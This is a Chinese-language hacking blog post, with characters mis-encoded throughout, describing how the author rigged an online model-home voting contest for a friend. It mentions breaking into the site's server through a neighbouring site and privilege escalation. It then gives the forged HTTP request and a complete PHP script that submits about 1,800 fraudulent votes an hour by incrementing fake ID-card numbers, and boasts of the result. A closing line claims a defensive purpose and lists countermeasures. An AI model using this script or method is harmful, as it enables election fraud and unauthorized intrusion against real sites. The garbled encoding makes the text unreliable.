前幾日朋友找我?guī)兔?說(shuō)是在一個(gè)網(wǎng)站參加樣板房投票競(jìng)選.有沒(méi)有辦法幫他刷第一票.心腸好的我自然是答應(yīng)了.然后朋友發(fā)來(lái)了網(wǎng)站..看了下是asp的..服務(wù)器安全做的還不錯(cuò)..沒(méi)找到任何程序上的漏洞..通過(guò)旁注提權(quán)入侵進(jìn)去后.發(fā)現(xiàn)管理員真的是很變態(tài)..本來(lái)打算修改數(shù)據(jù)庫(kù)的.剛看了下投票的代碼準(zhǔn)備找出數(shù)據(jù)庫(kù)連接文件.就被管理踢了..接著這事就擱下了..過(guò)了幾天朋友又催..只好又看了下..才發(fā)現(xiàn)所有的漏洞都已經(jīng)補(bǔ)掉..

還是直接從投票上入手把.希望可以找到突破口直接達(dá)到刷票的目的.投票選項(xiàng)如圖1.

圖1

朋友的樣板房名為"風(fēng) 華廊"所以圖1中我勾選上了"風(fēng)·華廊"最多可選10項(xiàng)..其中姓名.聯(lián)系電話.身份證號(hào)碼都是虛構(gòu)的.經(jīng)過(guò)反復(fù)投票測(cè)試.此投票系統(tǒng)只對(duì)身份證號(hào)碼進(jìn)行了驗(yàn)證..假設(shè)一下身份證號(hào)為1234567890.姓名為測(cè)試.聯(lián)系電話:13013011111 只需要把身份證號(hào)碼改為別的數(shù)字.如1234567891就可以再投上一票..并未對(duì)IP和cookies進(jìn)行驗(yàn)證.完全可以達(dá)到刷票的目的..

圖2是我抓的投票成功的數(shù)據(jù)包.

圖1

Aname=%B7%E7%26%238226%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel=13013011111&idcord=1234567890&Submit=%CC%E1%BD%BB

根據(jù)數(shù)據(jù)包構(gòu)造出URL為

http://www.xxxx.com/ad/20061221/a.asp?action=add&Aname=%B7%E7%26%238226%3B%BB%AA% ... 13013011111&idcord=1234567890&Submit=%CC%E1%BD%BB

直接在IE里打開(kāi)此頁(yè)面會(huì)出現(xiàn)如圖3的提示

圖1

但只要我們把其中的idcord=1234567890改為idcord=1234567891就會(huì)出現(xiàn)投票成功的對(duì)話框.知道了投票系統(tǒng)存在的缺陷后..現(xiàn)在就想辦法利用程序?qū)崿F(xiàn)刷票的目的..

寫(xiě)一個(gè)發(fā)包的程序把idcord設(shè)置為一個(gè)變量.然后每發(fā)送一次數(shù)據(jù)這個(gè)變量得數(shù)字就增加一個(gè)數(shù).比如idcord=1234567**9循環(huán)一次就是idcord=1234567*79自動(dòng)改變其中的數(shù)值..

這樣的程序用VB.C.ASP,PHP都不難實(shí)現(xiàn)..下面就介紹下PHP的..以下所涉及到的PHP代碼為EST的兄弟TTFCT所寫(xiě).

程序完整代碼(目標(biāo)網(wǎng)站做了相應(yīng)處理)

{?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",2);
print_r(Voting.... );
for($i=0;$i〈=9;$i++)
for($j=0;$j〈=9;$j++)
for($k=0;$k〈=9;$k++)
for($l=0;$l〈=9;$l++)
{
$packet ="POST /ad/20061221/a.asp?action=add HTTP/1.1 \r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg,
 image/pjpeg, application/x-shockwave-flash, */* \r\n";
$packet.="Referer: http//www.xxx.com/ad/20061221/a.asp \r\n";
$packet.="Accept-Language: zh-cn \r\n";
$packet.="Content-Type: application/x-www-form-urlencoded \r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)\r\n";
$packet.="Host: www.xxx.com \r\n";
$packet.="Content-Length: 113 \r\n";
$packet.="Connection: Keep-Alive \r\n";
$packet.="Cache-Control: no-cache \r\n";
$packet.="Cookie: ASPSESSIONIDASDCQDBT=NKKJPDLAMAMNHJHHNBBLOCCH\r\n\r\n";
$packet.="Aname=%B7%E7%26%238226%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel
=13013011111&idcord=1234".$i.$j.$k.$l."90&Submit=%CC%E1%BD%BB\r\n";
if($fp=fsockopen("))
if(fwrite($fp,$packet,strlen($packet)))
print_r(
Success to vote
);
sleep(2);
print_r(
Wait for 2 seconds
);
}
?}

懂PHP的朋友一眼就能看出,這只是個(gè)發(fā)包的程序..其中ini_set("default_socket_timeout",2);為發(fā)送數(shù)據(jù)包的間隔時(shí)間為2秒.

for($i=0;$i<=9;$i++)

for($j=0;$j<=9;$j++)

for($k=0;$k<=9;$k++)

for($l=0;$l<=9;$l++)

是設(shè)置好的四個(gè)變量.在下面的數(shù)據(jù)包中..idcord=1234".$i.$j.$k.$l."90 自動(dòng)生成idcord為一個(gè)不重復(fù)的數(shù)值

利用程序?qū)懞昧?.下面就開(kāi)始刷票..因?yàn)槭荘HP程序..所以要找個(gè)支持PHP的空間來(lái)運(yùn)行..就算沒(méi)有空間只要安裝AppServ也一樣可以..AppServ可以在http://www.skycn.com/soft/13703.html免費(fèi)下載到.安裝過(guò)程很簡(jiǎn)單的..這里就不說(shuō)了..

先來(lái)看下未刷票前.."風(fēng)華廊"的票數(shù)是多少...

從圖4中可以看到是22票..接著我們執(zhí)行PHP代碼..

圖4

出現(xiàn)"Success to vote"就是投票成功了..

圖5

因?yàn)槲以O(shè)置的是2秒鐘投一票..一個(gè)小時(shí)也就是1800票.所以經(jīng)過(guò)一個(gè)多小時(shí)后"風(fēng)華廊"的票數(shù)成了2227票.圖6

圖6

朋友的作品理所當(dāng)然的就拿了第一..而我也因此獲得了一頓豐富的午餐.

其實(shí)這樣的投票程序只要加上cookies驗(yàn)證..一個(gè)IP只能投一票..每次投票的間隔時(shí)間..等措施就很難作弊了.此文并不是要教大家如何去刷投票.只是想以投票的目的讓大家知道是如何刷票的..并在知道刷票的同時(shí)怎樣去防范它..